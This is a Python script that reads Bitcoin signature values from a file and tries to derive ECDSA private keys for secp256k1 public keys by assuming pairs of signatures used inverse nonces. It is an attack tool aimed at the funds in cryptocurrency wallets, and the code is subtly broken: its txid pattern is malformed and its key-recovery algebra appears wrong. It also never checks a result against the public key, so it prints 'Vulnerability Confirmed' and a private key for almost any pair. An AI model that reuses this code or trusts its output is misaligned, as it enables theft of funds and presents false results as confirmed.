import os
import re
from collections import defaultdict
from ecdsa.curves import SECP256k1

# SECP256k1 Curve Order
N = SECP256k1.generator.order

def parse_addy_file(filename="ADDY.txt"):
    """
    Parses txid, address, pubkey, r, s, and z values from ADDY.txt.
    Groups transactions by public key because mathematical relations 
    only apply to signatures generated by the same private key.
    """
    if not os.path.exists(filename):
        print(f"Error: {filename} not found. Creating a template file.")
        with open(filename, "w") as f:
            f.write("# Paste your transaction blocks here\n")
        return {}

    # Structure to group transactions: { pubkey: [ {r, s, z, txid}, ... ] }
    pubkey_groups = defaultdict(list)
    
    with open(filename, "r") as f:
        content = f.read()

    # Split content by the separator lines to isolate each transaction block
    blocks = re.split(r'-{2,}', content)
    
    for block in blocks:
        if not block.strip():
            continue
            
        # Extract fields using simple string search / regex
        txid = re.search(r'txid:\s*([a-fA-F0-0]+)', block)
        pubkey = re.search(r'pubkey:\s*([a-fA-F0-9]+)', block)
        r_val = re.search(r'\br:\s*([a-fA-F0-9]+)', block)
        s_val = re.search(r'\bs:\s*([a-fA-F0-9]+)', block)
        z_val = re.search(r'\bz:\s*([a-fA-F0-9]+)', block)
        
        # Only collect if all required signature parameters are found
        if pubkey and r_val and s_val and z_val:
            tx_data = {
                "txid": txid.group(1) if txid else "Unknown",
                "r": int(r_val.group(1), 16),
                "s": int(s_val.group(1), 16),
                "z": int(z_val.group(1), 16)
            }
            pubkey_groups[pubkey.group(1)].append(tx_data)
            
    return pubkey_groups

def solve_analytic_inverse_nonce(tx1, tx2):
    """
    Calculates the private key algebraically assuming an inverse nonce relation:
    k2 = k1^-1 mod N
    """
    r1, s1, z1 = tx1["r"], tx1["s"], tx1["z"]
    r2, s2, z2 = tx2["r"], tx2["s"], tx2["z"]

    s_prod = (s1 * s2) % N
    numerator = (s_prod * z2 - z1) % N
    denominator = (r1 - s_prod * r2) % N
    
    if denominator == 0:
        return None
        
    inv_denominator = pow(denominator, N - 2, N)
    private_key = (numerator * inv_denominator) % N
    
    return private_key

# --- Execution ---
if __name__ == "__main__":
    input_file = "ADDY.txt"
    print(f"Reading and parsing {input_file}...")
    
    grouped_transactions = parse_addy_file(input_file)
    total_pubkeys = len(grouped_transactions)
    
    print(f"Found {total_pubkeys} unique public key groups.\n")
    
    vulnerabilities_found = 0
    
    for pubkey, tx_list in grouped_transactions.items():
        tx_count = len(tx_list)
        print(f"Key: {pubkey[:10]}... ({tx_count} transactions found)")
        
        if tx_count < 2:
            print(" -> Insufficient transactions for this key to run pairwise analysis.\n")
            continue
            
        # Pairwise comparison inside the same public key group
        for i in range(tx_count):
            for j in range(i + 1, tx_count):
                tx1 = tx_list[i]
                tx2 = tx_list[j]
                
                print(f" -> Checking pair: TX1({tx1['txid'][:8]}) & TX2({tx2['txid'][:8]})")
                priv_key = solve_analytic_inverse_nonce(tx1, tx2)
                
                if priv_key and priv_key > 0:
                    print(f" [!] CRITICAL: Inverse Nonce Vulnerability Confirmed!")
                    print(f" [!] Private Key (Hex): {hex(priv_key)}")
                    vulnerabilities_found += 1
                else:
                    print(" -> No inverse relation detected between this pair.")
        print()
                    
    if vulnerabilities_found == 0:
        print("Analysis finished. No inverse nonce anomalies identified in the current dataset.")
